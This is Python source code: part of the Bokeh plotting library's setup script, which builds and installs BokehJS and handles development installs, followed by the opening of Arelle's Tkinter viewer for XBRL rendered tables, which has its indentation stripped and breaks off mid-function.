def red(text): return "%s%s%s" % (colorama.Fore.RED, text, colorama.Style.RESET_ALL)
def green(text): return "%s%s%s" % (colorama.Fore.GREEN, text, colorama.Style.RESET_ALL)
def yellow(text): return "%s%s%s" % (colorama.Fore.YELLOW, text, colorama.Style.RESET_ALL)
sys.platform == "win32" and colorama.init()
except ImportError:
def bright(text): return text
def dim(text): return text
def white(text) : return text
def blue(text) : return text
def red(text) : return text
def green(text) : return text
def yellow(text) : return text
if 'nightly' in sys.argv:
from setuptools import setup
sys.argv.remove('nightly')
with open('__conda_version__.txt', 'r') as f:
version = f.read().rstrip()
vers_file = os.path.join('bokeh', '__conda_version__.py')
with open(vers_file, 'w') as f:
f.write("conda_version=" + "'" + version + "'")
else:
from distutils.core import setup
from distutils import dir_util
# Our own imports
import versioneer
# -----------------------------------------------------------------------------
# Globals and constants
# -----------------------------------------------------------------------------
ROOT = dirname(realpath(__file__))
BOKEHJSROOT = join(ROOT, 'bokehjs')
BOKEHJSBUILD = join(BOKEHJSROOT, 'build')
CSS = join(BOKEHJSBUILD, 'css')
JS = join(BOKEHJSBUILD, 'js')
SERVER = join(ROOT, 'bokeh/server')
if sys.version_info[0] < 3:
input = raw_input
# -----------------------------------------------------------------------------
# Local utilities
# -----------------------------------------------------------------------------
versioneer.versionfile_source = 'bokeh/_version.py'
versioneer.versionfile_build = 'bokeh/_version.py'
versioneer.tag_prefix = '' # tags are like 1.2.0
versioneer.parentdir_prefix = 'Bokeh-' # dirname like 'myproject-1.2.0'
# -----------------------------------------------------------------------------
# Classes and functions
# -----------------------------------------------------------------------------
copy("LICENSE.txt", "bokeh/")
package_data = ['LICENSE.txt', 'themes/*.yaml']
def package_path(path, filters=()):
if not os.path.exists(path):
raise RuntimeError("packaging non-existent path: %s" % path)
elif os.path.isfile(path):
package_data.append(relpath(path, 'bokeh'))
else:
for path, dirs, files in os.walk(path):
path = relpath(path, 'bokeh')
for f in files:
if not filters or f.endswith(filters):
package_data.append(join(path, f))
# You can't install Bokeh in a virtualenv because the lack of getsitepackages()
# This is an open bug: https://github.com/pypa/virtualenv/issues/355
# And this is an intended PR to fix it: https://github.com/pypa/virtualenv/pull/508
# Workaround to fix our issue: https://github.com/bokeh/bokeh/issues/378
def getsitepackages():
"""Returns a list containing all global site-packages directories
(and possibly site-python)."""
_is_64bit = (getattr(sys, 'maxsize', None) or getattr(sys, 'maxint')) > 2**32
_is_pypy = hasattr(sys, 'pypy_version_info')
_is_jython = sys.platform[:4] == 'java'
prefixes = [sys.prefix, sys.exec_prefix]
sitepackages = []
seen = set()
for prefix in prefixes:
if not prefix or prefix in seen:
continue
seen.add(prefix)
if sys.platform in ('os2emx', 'riscos') or _is_jython:
sitedirs = [os.path.join(prefix, "Lib", "site-packages")]
elif _is_pypy:
sitedirs = [os.path.join(prefix, 'site-packages')]
elif sys.platform == 'darwin' and prefix == sys.prefix:
if prefix.startswith("/System/Library/Frameworks/"): # Apple's Python
sitedirs = [os.path.join("/Library/Python", sys.version[:3], "site-packages"),
os.path.join(prefix, "Extras", "lib", "python")]
else: # any other Python distros on OSX work this way
sitedirs = [os.path.join(prefix, "lib",
"python" + sys.version[:3], "site-packages")]
elif os.sep == '/':
sitedirs = [os.path.join(prefix,
"lib",
"python" + sys.version[:3],
"site-packages"),
os.path.join(prefix, "lib", "site-python"),
]
lib64_dir = os.path.join(prefix, "lib64", "python" + sys.version[:3], "site-packages")
if (os.path.exists(lib64_dir) and
os.path.realpath(lib64_dir) not in [os.path.realpath(p) for p in sitedirs]):
if _is_64bit:
sitedirs.insert(0, lib64_dir)
else:
sitedirs.append(lib64_dir)
try:
# sys.getobjects only available in --with-pydebug build
sys.getobjects
sitedirs.insert(0, os.path.join(sitedirs[0], 'debug'))
except AttributeError:
pass
# Debian-specific dist-packages directories:
sitedirs.append(os.path.join(prefix, "local/lib",
"python" + sys.version[:3],
"dist-packages"))
sitedirs.append(os.path.join(prefix, "lib",
"python" + sys.version[:3],
"dist-packages"))
if sys.version_info[0] >= 3:
sitedirs.append(os.path.join(prefix, "lib",
"python" + sys.version[0],
"dist-packages"))
sitedirs.append(os.path.join(prefix, "lib", "dist-python"))
else:
sitedirs = [os.path.join(prefix, "lib", "site-packages"), prefix]
if sys.platform == 'darwin':
# for framework builds *only* we add the standard Apple
# locations. Currently only per-user, but /Library and
# /Network/Library could be added too
if 'Python.framework' in prefix:
home = os.environ.get('HOME')
if home:
sitedirs.append(
os.path.join(home,
'Library',
'Python',
sys.version[:3],
'site-packages'))
for sitedir in sitedirs:
sitepackages.append(os.path.abspath(sitedir))
sitepackages = [p for p in sitepackages if os.path.isdir(p)]
return sitepackages
def check_remove_bokeh_install(site_packages):
old_bokeh_files = []
for d in os.listdir(site_packages):
bokeh_path = join(site_packages, d)
if not (d == 'bokeh' or d.startswith('bokeh-')):
continue
old_bokeh_files.append(bokeh_path)
if len(old_bokeh_files) == 0:
return
print("Found old Bokeh files:")
for path in old_bokeh_files:
print(" - %s" % path)
val = input("Remove %s? [y|N] " % ("it" if len(old_bokeh_files)==1 else "them",))
if val == "y":
print("Removing old Bokeh files...", end=" ")
for path in old_bokeh_files:
try:
if isdir(path): shutil.rmtree(path)
else: os.remove(path)
except (IOError, OSError) as e:
print(bright(red("\nUnable to remove old Bokeh file at %s, exiting" % path)) + " [reason: %s]" % e)
sys.exit(-1)
print("Done")
else:
print(bright(red("Old Bokeh files not removed, exiting.")))
sys.exit(1)
def remove_bokeh_pth(path_file):
if exists(path_file):
try:
os.remove(path_file)
except (IOError, OSError):
print(bright(red("Unable to remove old path file at %s, exiting" % path_file)))
sys.exit(-1)
return True
return False
BUILD_EXEC_FAIL_MSG = bright(red("Failed.")) + """
ERROR: subprocess.Popen(%r) failed to execute:
%s
Have you run `npm install` from the bokehjs subdirectory?
For more information, see the Dev Guide:
http://bokeh.pydata.org/en/latest/docs/dev_guide.html
"""
BUILD_FAIL_MSG = bright(red("Failed.")) + """
ERROR: 'gulp build' returned the following
---- on stdout:
%s
---- on stderr:
%s
"""
BUILD_SIZE_FAIL_MSG = """
ERROR: could not determine sizes:
%s
"""
BUILD_SUCCESS_MSG = bright(green("Success!")) + """
Build output:
%s"""
def build_js():
print("Building BokehJS... ", end="")
sys.stdout.flush()
os.chdir('bokehjs')
if sys.platform != "win32":
cmd = [join('node_modules', '.bin', 'gulp'), 'build']
else:
cmd = [join('node_modules', '.bin', 'gulp.cmd'), 'build']
t0 = time.time()
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError as e:
print(BUILD_EXEC_FAIL_MSG % (cmd, e))
sys.exit(1)
finally:
os.chdir('..')
result = proc.wait()
t1 = time.time()
if result != 0:
indented_msg = ""
outmsg = proc.stdout.read().decode('ascii', errors='ignore')
outmsg = "\n".join([" " + x for x in outmsg.split("\n")])
errmsg = proc.stderr.read().decode('ascii', errors='ignore')
errmsg = "\n".join([" " + x for x in errmsg.split("\n")])
print(BUILD_FAIL_MSG % (red(outmsg), red(errmsg)))
sys.exit(1)
indented_msg = ""
msg = proc.stdout.read().decode('ascii', errors='ignore')
pat = re.compile(r"(\[.*\]) (.*)", re.DOTALL)
for line in msg.strip().split("\n"):
m = pat.match(line)
if not m: continue # skip generate.py output lines
stamp, txt = m.groups()
indented_msg += " " + dim(green(stamp)) + " " + dim(txt) + "\n"
msg = "\n".join([" " + x for x in msg.split("\n")])
print(BUILD_SUCCESS_MSG % indented_msg)
print("Build time: %s" % bright(yellow("%0.1f seconds" % (t1-t0))))
print()
print("Build artifact sizes:")
try:
def size(*path):
return os.stat(join("bokehjs", "build", *path)).st_size / 2**10
print(" - bokeh.js : %6.1f KB" % size("js", "bokeh.js"))
print(" - bokeh.css : %6.1f KB" % size("css", "bokeh.css"))
print(" - bokeh.min.js : %6.1f KB" % size("js", "bokeh.min.js"))
print(" - bokeh.min.css : %6.1f KB" % size("css", "bokeh.min.css"))
print(" - bokeh-widgets.js : %6.1f KB" % size("js", "bokeh-widgets.js"))
print(" - bokeh-widgets.css : %6.1f KB" % size("css", "bokeh-widgets.css"))
print(" - bokeh-widgets.min.js : %6.1f KB" % size("js", "bokeh-widgets.min.js"))
print(" - bokeh-widgets.min.css : %6.1f KB" % size("css", "bokeh-widgets.min.css"))
print(" - bokeh-api.js : %6.1f KB" % size("js", "bokeh-api.js"))
print(" - bokeh-api.min.js : %6.1f KB" % size("js", "bokeh-api.min.js"))
print(" - bokeh-compiler.js : %6.1f KB" % size("js", "bokeh-compiler.js"))
print(" - bokeh-compiler.min.js : %6.1f KB" % size("js", "bokeh-compiler.min.js"))
except Exception as e:
print(BUILD_SIZE_FAIL_MSG % e)
def install_js():
target_jsdir = join(SERVER, 'static', 'js')
target_cssdir = join(SERVER, 'static', 'css')
STATIC_ASSETS = [
join(JS, 'bokeh.js'),
join(JS, 'bokeh.min.js'),
join(CSS, 'bokeh.css'),
join(CSS, 'bokeh.min.css'),
]
if not all([exists(a) for a in STATIC_ASSETS]):
print("""
ERROR: Cannot install BokehJS: files missing in `./bokehjs/build`.
Please build BokehJS by running setup.py with the `--build_js` option.
Dev Guide: http://bokeh.pydata.org/docs/dev_guide.html#bokehjs.
""")
sys.exit(1)
if exists(target_jsdir):
shutil.rmtree(target_jsdir)
shutil.copytree(JS, target_jsdir)
if exists(target_cssdir):
shutil.rmtree(target_cssdir)
shutil.copytree(CSS, target_cssdir)
def clean():
print("Removing prior-built items...", end=" ")
build_dir = 'build/lib/bokeh'
if os.path.exists(build_dir):
dir_util.remove_tree(build_dir)
for root, dirs, files in os.walk('.'):
for item in files:
if item.endswith('.pyc'):
os.remove(os.path.join(root, item))
print("Done")
def get_user_jsargs():
print("""
Bokeh includes a JavaScript library (BokehJS) that has its own
build process. How would you like to handle BokehJS:
1) build and install fresh BokehJS
2) install last built BokehJS from bokeh/bokehjs/build
""")
mapping = {"1": True, "2": False}
value = input("Choice? ")
while value not in mapping:
print("Input '%s' not understood. Valid choices: 1, 2\n" % value)
value = input("Choice? ")
return mapping[value]
def parse_jsargs():
options = ('install', 'develop', 'sdist', 'egg_info', 'build')
installing = any(arg in sys.argv for arg in options)
if '--build_js' in sys.argv:
if not installing:
print("Error: Option '--build_js' only valid with 'install', 'develop', 'sdist', or 'build', exiting.")
sys.exit(1)
jsbuild = True
sys.argv.remove('--build_js')
elif '--install_js' in sys.argv:
# Note that --install_js can be used by itself (without sdist/install/develop)
jsbuild = False
sys.argv.remove('--install_js')
else:
if installing:
jsbuild = get_user_jsargs()
else:
jsbuild = False
return jsbuild
def package_tree(pkgroot):
""" Get list of packages by walking the directory structure and
including all dirs that have an __init__.py or are named test.
"""
subdirs = [os.path.relpath(i[0], ROOT).replace(os.path.sep, '.')
for i in os.walk(os.path.join(ROOT, pkgroot))
if '__init__.py' in i[2]]
return subdirs
# -----------------------------------------------------------------------------
# Main script
# -----------------------------------------------------------------------------
# Aliases for build_js and install_js
for i in range(len(sys.argv)):
if sys.argv[i] == '--build-js':
sys.argv[i] = '--build_js'
if sys.argv[i] == '--install-js':
sys.argv[i] = '--install_js'
# Set up this checkout or source archive with the right BokehJS files.
if sys.version_info[:2] < (2, 6):
raise RuntimeError("Bokeh requires python >= 2.6")
# Lightweight command to only install js and nothing more - developer mode
if len(sys.argv) == 2 and sys.argv[-1] == '--install_js':
install_js()
sys.exit(0)
# check for 'sdist' and make sure we always do a BokehJS build when packaging
if "sdist" in sys.argv:
if "--install_js" in sys.argv:
print("Removing '--install_js' incompatible with 'sdist'")
sys.argv.remove('--install_js')
if "--build_js" not in sys.argv:
print("Adding '--build_js' required for 'sdist'")
sys.argv.append('--build_js')
# check for package install, set jsinstall to False to skip prompt
jsinstall = True
if not exists(join(ROOT, 'MANIFEST.in')):
if "--build_js" in sys.argv or "--install_js" in sys.argv:
print("BokehJS source code is not shipped in sdist packages; "
"building/installing from the bokehjs source directory is disabled. "
"To build or develop BokehJS yourself, you must clone the full "
"Bokeh repository from https://github.com/bokeh/bokeh")
if "--build_js" in sys.argv:
sys.argv.remove('--build_js')
if "--install_js" in sys.argv:
sys.argv.remove('--install_js')
jsbuild = False
jsinstall = False
else:
jsbuild = parse_jsargs()
if jsbuild:
build_js()
if jsinstall:
install_js()
sampledata_suffixes = ('.csv', '.conf', '.gz', '.json', '.png', '.ics', '.geojson')
package_path(join(SERVER, 'static'))
package_path(join(ROOT, 'bokeh', 'core', '_templates'))
package_path(join(ROOT, 'bokeh', 'server', 'views'), ('.html'))
package_path(join(ROOT, 'bokeh', 'sampledata'), sampledata_suffixes)
if '--user' in sys.argv:
site_packages = site.USER_SITE
else:
site_packages = getsitepackages()[0]
path_file = join(site_packages, "bokeh.pth")
path = abspath(dirname(__file__))
print()
if 'develop' in sys.argv:
# Note that setuptools supports 'develop' too, but we roll our own implementation
# that removes any existing Bokeh installation, and works in virtualenv
if exists('bokeh/__conda_version__.py'):
print(bright(red("ERROR:")) + " Detected a __conda_version__.py file, exiting")
sys.exit(1)
check_remove_bokeh_install(site_packages)
with open(path_file, "w+") as f:
f.write(path)
print("Installing Bokeh for development:")
print(" - writing path '%s' to %s" % (path, path_file))
if jsinstall:
print(" - using %s built BokehJS from bokehjs/build\n" % (bright(yellow("NEWLY")) if jsbuild else bright(yellow("PREVIOUSLY"))))
else:
print(" - using %s BokehJS, located in 'bokeh.server.static'\n" % yellow("PACKAGED"))
sys.exit()
elif 'clean' in sys.argv:
clean()
elif 'install' in sys.argv:
pth_removed = remove_bokeh_pth(path_file)
print("Installing Bokeh:")
if pth_removed:
print(" - removed path file at %s" % path_file)
if jsinstall:
print(" - using %s built BokehJS from bokehjs/build\n" % (bright(yellow("NEWLY")) if jsbuild else bright(yellow("PREVIOUSLY"))))
else:
print(" - using %s BokehJS, located in 'bokeh.server.static'\n" % bright(yellow("PACKAGED")))
elif '--help' in sys.argv:
if jsinstall:
print("Bokeh-specific options available with 'install' or 'develop':")
print()
print(" --build_js build and install a fresh BokehJS")
print(" --install_js install only last previously built BokehJS")
else:
print("Bokeh is using PACKAGED BokehJS, located in 'bokeh.server.static'")
print()
print()
REQUIRES = [
'six>=1.5.2',
'requests>=1.2.3',
'PyYAML>=3.10',
'python-dateutil>=2.1',
'Jinja2>=2.7',
'numpy>=1.7.1',
'tornado>=4.3',
]
if sys.version_info[:2] == (2, 7):
REQUIRES.append('futures>=3.0.3')
_version = versioneer.get_version()
_cmdclass = versioneer.get_cmdclass()
# Horrible hack: workaround to allow creation of bdist_wheel on pip installation
# Why, for God's sake, is pip forcing the generation of wheels when installing a package?
try:
from wheel.bdist_wheel import bdist_wheel
except ImportError as e:
# pip is not claiming for bdist_wheel when wheel is not installed
bdist_wheel = None
if bdist_wheel is not None:
_cmdclass["bdist_wheel"] = bdist_wheel
# Note on scripts and entry points. The 'scripts' value is handled by
# distutils but does not provide an .exe, making it not very useful on
# Windows. The 'entry_points' value is handled only if setuptools is
# used, and does make an .exe. Note that in our conda recipe, we
# seperately define an entry point.
setup(
name='bokeh',
version=_version,
cmdclass=_cmdclass,
packages=package_tree('bokeh'),
package_data={'bokeh': package_data},
author='Continuum Analytics',
author_email='info@continuum.io',
url='http://github.com/bokeh/bokeh',
description='Statistical and novel interactive HTML plots for Python',
license='New BSD',
scripts=['bin/bokeh', 'bin/bokeh-server'],
entry_points={'console_scripts': ['bokeh = bokeh.__main__:main',], },
zip_safe=False,
install_requires=REQUIRES
)
| |
'''
Created on Oct 5, 2010
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
import os, threading, time, logging
from tkinter import Menu, BooleanVar, font as tkFont
from arelle import (ViewWinTkTable, ModelDocument, ModelDtsObject, ModelInstanceObject, XbrlConst,
ModelXbrl, Locale, FunctionXfi,
ValidateXbrlDimensions)
from arelle.ModelValue import qname, QName
from arelle.RenderingResolver import resolveAxesStructure, RENDER_UNITS_PER_CHAR
from arelle.ModelFormulaObject import Aspect, aspectModels, aspectModelAspect
from arelle.ModelInstanceObject import ModelDimensionValue
from arelle.ModelRenderingObject import (ModelClosedDefinitionNode, ModelEuAxisCoord,
ModelFilterDefinitionNode,
OPEN_ASPECT_ENTRY_SURROGATE)
from arelle.FormulaEvaluator import init as formulaEvaluatorInit, aspectMatches
from arelle.PrototypeInstanceObject import FactPrototype
from arelle.UITkTable import XbrlTable
from arelle.DialogNewFactItem import getNewFactItemOptions
from collections import defaultdict
from arelle.ValidateXbrl import ValidateXbrl
from arelle.XbrlConst import eurofilingModelNamespace, eurofilingModelPrefix
from arelle.ValidateXbrlDimensions import isFactDimensionallyValid
from arelle.XmlValidate import UNVALIDATED, validate as xmlValidate
try:
from tkinter import ttk
_Combobox = ttk.Combobox
except ImportError:
from ttk import Combobox
_Combobox = Combobox
emptyList = []
ENTRY_WIDTH_IN_CHARS = 12 # width of a data column entry cell in characters (nominal)
ENTRY_WIDTH_SCREEN_UNITS = 100
PADDING = 20 # screen units of padding between entry cells
qnPercentItemType = qname("{http://www.xbrl.org/dtr/type/numeric}num:percentItemType")
qnPureItemType = qname("{http://www.xbrl.org/2003/instance}xbrli:pureItemType")
integerItemTypes = {"integerItemType", "nonPositiveIntegerItemType", "negativeIntegerItemType",
"longItemType", "intItemType", "shortItemType", "byteItemType",
"nonNegativeIntegerItemType", "unsignedLongItemType", "unsignedIntItemType",
"unsignedShortItemType", "unsignedByteItemType", "positiveIntegerItemType"}
TABLE_AXIS_ROLES = (XbrlConst.euTableAxis, XbrlConst.tableBreakdown, XbrlConst.tableBreakdownMMDD, XbrlConst.tableBreakdown201305, XbrlConst.tableBreakdown201301, XbrlConst.tableAxis2011)
'''
Returns a tuple with all known table axis roles
'''
def getTableAxisArcroles():
return TABLE_AXIS_ROLES
def viewRenderedGrid(modelXbrl, tabWin, lang=None):
modelXbrl.modelManager.showStatus(_("viewing rendering"))
view = ViewRenderedGrid(modelXbrl, tabWin, lang)
view.blockMenuEvents = 1
menu = view.contextMenu()
optionsMenu = Menu(view.viewFrame, tearoff=0)
optionsMenu.add_command(label=_("New fact item options"), underline=0, command=lambda: getNewFactItemOptions(modelXbrl.modelManager.cntlr, view.newFactItemOptions))
optionsMenu.add_command(label=_("Open breakdown entry rows"), underline=0, command=view.setOpenBreakdownEntryRows)
view.ignoreDimValidity.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("Ignore Dimensional Validity"), underline=0, variable=view.ignoreDimValidity, onvalue=True, offvalue=False)
view.xAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("X-Axis Children First"), underline=0, variable=view.xAxisChildrenFirst, onvalue=True, offvalue=False)
view.yAxisChildrenFirst.trace("w", view.viewReloadDueToMenuAction)
optionsMenu.add_checkbutton(label=_("Y-Axis Children First"), underline=0, variable=view.yAxisChildrenFirst, onvalue=True, offvalue=False)
menu.add_cascade(label=_("Options"), menu=optionsMenu, underline=0)
view.tablesMenu = Menu(view.viewFrame, tearoff=0)
menu.add_cascade(label=_("Tables"), menu=view.tablesMenu, underline=0)
view.tablesMenuLength = 0
view.menuAddLangs()
saveMenu = Menu(view.viewFrame, tearoff=0)
saveMenu.add_command(label=_("HTML file"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="html"))
saveMenu.add_command(label=_("Layout model"), underline=0, command=lambda: view.modelXbrl.modelManager.cntlr.fileSave(view=view, fileType="xml"))
saveMenu.add_command(label=_("XBRL instance"), underline=0, command=view.saveInstance)
menu.add_cascade(label=_("Save"), menu=saveMenu, underline=0)
view.view()
view.blockSelectEvent = 1
view.blockViewModelObject = 0
view.viewFrame.bind("<Enter>", view.cellEnter, '+')
view.viewFrame.bind("<Leave>", view.cellLeave, '+')
view.viewFrame.bind("<FocusOut>", view.onQuitView, '+')
view.viewFrame.bind("<1>", view.onClick, '+') # does not currently work (since tktable changes)
view.viewFrame.bind("<Configure>", view.onConfigure, '+') # frame resized, redo column header wrap length ratios
view.blockMenuEvents = 0
return view
class ViewRenderedGrid(ViewWinTkTable.ViewTkTable):
def __init__(self, modelXbrl, tabWin, lang):
super(ViewRenderedGrid, self).__init__(modelXbrl, tabWin, _("Table"),
False, lang, self.onQuitView)
self.newFactItemOptions = ModelInstanceObject.NewFactItemOptions(xbrlInstance=modelXbrl)
self.factPrototypes = []
self.aspectEntryObjectIdsNode = {}
self.aspectEntryObjectIdsCell = {}
self.factPrototypeAspectEntryObjectIds = defaultdict(set)
self.zOrdinateChoices = None
# context menu Boolean vars
self.options = self.modelXbrl.modelManager.cntlr.config.setdefault("viewRenderedGridOptions", {})
self.openBreakdownLines = self.options.setdefault("openBreakdownLines", 5) # ensure there is a default entry
self.ignoreDimValidity = BooleanVar(value=self.options.setdefault("ignoreDimValidity",True))
self.xAxisChildrenFirst = BooleanVar(value=self.options.setdefault("xAxisChildrenFirst",True))
self.yAxisChildrenFirst = BooleanVar(value=self.options.setdefault("yAxisChildrenFirst",False))
formulaEvaluatorInit() # one-time module initialization
def close(self):
super(ViewRenderedGrid, self).close()
if self.modelXbrl:
for fp in self.factPrototypes:
fp.clear()
self.factPrototypes = None
self.aspectEntryObjectIdsNode.clear()
self.aspectEntryObjectIdsCell.clear()
self.rendrCntx = None # remove the reference but do not manipulate since it may still be in use and shared
def loadTablesMenu(self):
tblMenuEntries = {}
tblRelSet = self.modelXbrl.relationshipSet("Table-rendering")
self.tablesToELR = {}
for tblLinkroleUri in tblRelSet.linkRoleUris:
for tableAxisArcrole in getTableAxisArcroles():
tblAxisRelSet = self.modelXbrl.relationshipSet(tableAxisArcrole, tblLinkroleUri)
if tblAxisRelSet and len(tblAxisRelSet.modelRelationships) > 0:
# table name
modelRoleTypes = self.modelXbrl.roleTypes.get(tblLinkroleUri)
if modelRoleTypes is not None and len(modelRoleTypes) > 0:
roledefinition = modelRoleTypes[0].definition
if roledefinition is None or roledefinition == "":
roledefinition = os.path.basename(tblLinkroleUri)
for table in tblAxisRelSet.rootConcepts:
# add table to menu if there's any entry
tblMenuEntries[roledefinition] = tblLinkroleUri
self.tablesToELR[table.objectId()] = tblLinkroleUri
break
self.tablesMenu.delete(0, self.tablesMenuLength)
self.tablesMenuLength = 0
self.tblELR = None
for tblMenuEntry in sorted(tblMenuEntries.items()):
tbl,elr = tblMenuEntry
self.tablesMenu.add_command(label=tbl, command=lambda e=elr: self.view(viewTblELR=e)) # use this to activate profiling from menu selection: , profile=True))
self.tablesMenuLength += 1
if self.tblELR is None:
self.tblELR = elr # start viewing first ELR
def viewReloadDueToMenuAction(self, *args):
if not self.blockMenuEvents:
# update config (config saved when exiting)
self.options["ignoreDimValidity"] = self.ignoreDimValidity.get()
self.options["xAxisChildrenFirst"] = self.xAxisChildrenFirst.get()
self.options["yAxisChildrenFirst"] = self.yAxisChildrenFirst.get()
self.view()
def setOpenBreakdownEntryRows(self, *args):
import tkinter.simpledialog
newValue = tkinter.simpledialog.askinteger(_("arelle - Open breakdown entry rows setting"),
_("The number of extra entry rows for open breakdowns is: {0} \n\n"
"(When a row header includes an open breakdown, such as \nfor typed dimension(s), this number of extra entry rows \nare provided below the table.)"
).format(self.options["openBreakdownLines"]),
parent=self.tabWin)
if newValue is not None:
self.options["openBreakdownLines"] = self.openBreakdownLines = newValue
self.viewReloadDueToMenuAction()
def view(self, viewTblELR=None, newInstance=None, profile=False):
'''
if profile: # for debugging only, to use, uncomment in loadTablesMenu
import cProfile, pstats, sys
statsFile = "/Users/hermf/temp/profileRendering.bin"
cProfile.runctx("self.view(viewTblELR=viewTblELR)", globals(), locals(), statsFile)
priorStdOut = sys.stdout
sys.stdout = open("/Users/hermf/temp/profileRendering.txt", "w")
statObj = pstats.Stats(statsFile)
statObj.strip_dirs()
statObj.sort_stats("time")
statObj.print_stats()
statObj.print_callees()
statObj.print_callers()
sys.stdout.flush()
sys.stdout.close()
del statObj
sys.stdout = priorStdOut
os.remove(statsFile)
return
'''
startedAt = time.time()
self.blockMenuEvents += 1
if newInstance is not None:
self.modelXbrl = newInstance # a save operation has created a new instance to use subsequently
clearZchoices = False
if viewTblELR: # specific table selection
self.tblELR = viewTblELR
clearZchoices = True
else: # first or subsequenct reloading (language, dimensions, other change)
clearZchoices = self.zOrdinateChoices is None
if clearZchoices: # also need first time initialization
self.loadTablesMenu() # load menus (and initialize if first time
viewTblELR = self.tblELR
if not self.tblELR:
return # no table to display
if clearZchoices:
self.zOrdinateChoices = {}
# remove old widgets
self.viewFrame.clearGrid()
tblAxisRelSet, xTopStructuralNode, yTopStructuralNode, zTopStructuralNode = resolveAxesStructure(self, viewTblELR)
colAdjustment = 1 if zTopStructuralNode is not None else 0
self.table.resizeTable(self.dataFirstRow+self.dataRows-1, self.dataFirstCol+self.dataCols+colAdjustment-1, titleRows=self.dataFirstRow-1, titleColumns=self.dataFirstCol-1)
self.hasTableFilters = bool(self.modelTable.filterRelationships)
if tblAxisRelSet:
# review row header wrap widths and limit to 2/3 of the frame width (all are screen units)
fontWidth = tkFont.Font(font='TkTextFont').configure()['size']
fontWidth = fontWidth * 3 // 2
dataColsAllowanceWidth = (fontWidth * ENTRY_WIDTH_IN_CHARS + PADDING) * self.dataCols + PADDING
frameWidth = self.viewFrame.winfo_width()
if dataColsAllowanceWidth + self.rowHdrWrapLength > frameWidth:
if dataColsAllowanceWidth > frameWidth / 2:
rowHdrAllowanceWidth = frameWidth / 2
else:
rowHdrAllowanceWidth = frameWidth - dataColsAllowanceWidth
if self.rowHdrWrapLength > rowHdrAllowanceWidth:
widthRatio = rowHdrAllowanceWidth / self.rowHdrWrapLength
self.rowHdrWrapLength = rowHdrAllowanceWidth
fixedWidth = sum(w for w in self.rowHdrColWidth if w <= RENDER_UNITS_PER_CHAR)
adjustableWidth = sum(w for w in self.rowHdrColWidth if w > RENDER_UNITS_PER_CHAR)
if adjustableWidth> 0:
widthRatio = (rowHdrAllowanceWidth - fixedWidth) / adjustableWidth
for i in range(len(self.rowHdrColWidth)):
w = self.rowHdrColWidth[i]
if w > RENDER_UNITS_PER_CHAR:
self.rowHdrColWidth[i] = int(w * widthRatio)
self.aspectEntryObjectIdsNode.clear()
self.aspectEntryObjectIdsCell.clear()
self.factPrototypeAspectEntryObjectIds.clear()
self.table.initHeaderCellValue((self.modelTable.genLabel(lang=self.lang, strip=True) or # use table label, if any
self.roledefinition),
0, 0, (self.dataFirstCol - 2),
(self.dataFirstRow - 2),
XbrlTable.TG_TOP_LEFT_JUSTIFIED)
self.zAspectStructuralNodes = defaultdict(set)
self.zAxis(1, zTopStructuralNode, clearZchoices)
xStructuralNodes = []
colsFoundPlus1, _, _, _ = self.xAxis(self.dataFirstCol, self.colHdrTopRow, self.colHdrTopRow + self.colHdrRows - 1,
xTopStructuralNode, xStructuralNodes, self.xAxisChildrenFirst.get(), True, True)
_, rowsFoundPlus1 = self.yAxis(1, self.dataFirstRow,
yTopStructuralNode, self.yAxisChildrenFirst.get(), True, True)
self.table.resizeTable(rowsFoundPlus1-1,
colsFoundPlus1+colAdjustment-1,
clearData=False)
for fp in self.factPrototypes: # dereference prior facts
if fp is not None:
fp.clear()
self.factPrototypes = []
startedAt2 = time.time()
self.bodyCells(self.dataFirstRow, yTopStructuralNode, xStructuralNodes, self.zAspectStructuralNodes, self.yAxisChildrenFirst.get())
#print("bodyCells {:.2f}secs ".format(time.time() - startedAt2) + self.roledefinition)
self.table.clearModificationStatus()
self.table.disableUnusedCells()
self.table.resizeTableCells()
# data cells
#print("body cells done")
self.modelXbrl.profileStat("viewTable_" + os.path.basename(viewTblELR), time.time() - startedAt)
#self.gridView.config(scrollregion=self.gridView.bbox(constants.ALL))
self.blockMenuEvents -= 1
def zAxis(self, row, zStructuralNode, clearZchoices):
if zStructuralNode is not None:
label = zStructuralNode.header(lang=self.lang)
xValue = self.dataFirstCol-1
yValue = row-1
self.table.initHeaderCellValue(label,
xValue, yValue,
0, 0,
XbrlTable.TG_LEFT_JUSTIFIED,
objectId=zStructuralNode.objectId())
if zStructuralNode.choiceStructuralNodes is not None: # combo box
valueHeaders = [''.ljust(zChoiceStructuralNode.indent * 4) + # indent if nested choices
(zChoiceStructuralNode.header(lang=self.lang) or '')
for zChoiceStructuralNode in zStructuralNode.choiceStructuralNodes]
zAxisIsOpenExplicitDimension = False
zAxisTypedDimension = None
i = zStructuralNode.choiceNodeIndex # for aspect entry, use header selected
comboBoxValue = None if i >= 0 else zStructuralNode.aspects.get('aspectValueLabel')
chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
aspect = None
for aspect in chosenStructuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
# for open filter nodes of explicit dimension allow selection of all values
zAxisAspectEntryMode = False
if isinstance(chosenStructuralNode.definitionNode, ModelFilterDefinitionNode):
if isinstance(aspect, QName):
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
if len(valueHeaders) != 1 or valueHeaders[0]: # not just a blank initial entry
valueHeaders.append("(all members)")
else:
valueHeaders.extend(
self.explicitDimensionFilterMembers(zStructuralNode, chosenStructuralNode))
zAxisAspectEntryMode = True
zAxisIsOpenExplicitDimension = True
elif dimConcept.isTypedDimension:
if (zStructuralNode.choiceStructuralNodes[0].contextItemBinding is None and
not valueHeaders[0]): # remove filterNode from the list
''' this isn't reliable
if i > 0:
del zStructuralNode.choiceStructuralNodes[0]
del valueHeaders[0]
zStructuralNode.choiceNodeIndex = i = i-1
'''
if i >= 0:
chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
else:
chosenStructuralNode = zStructuralNode # use aspects of structural node (for entered typed value)
if not comboBoxValue and not valueHeaders:
comboBoxValue = "--please select--"
i = -1
valueHeaders.append("(enter typed member)")
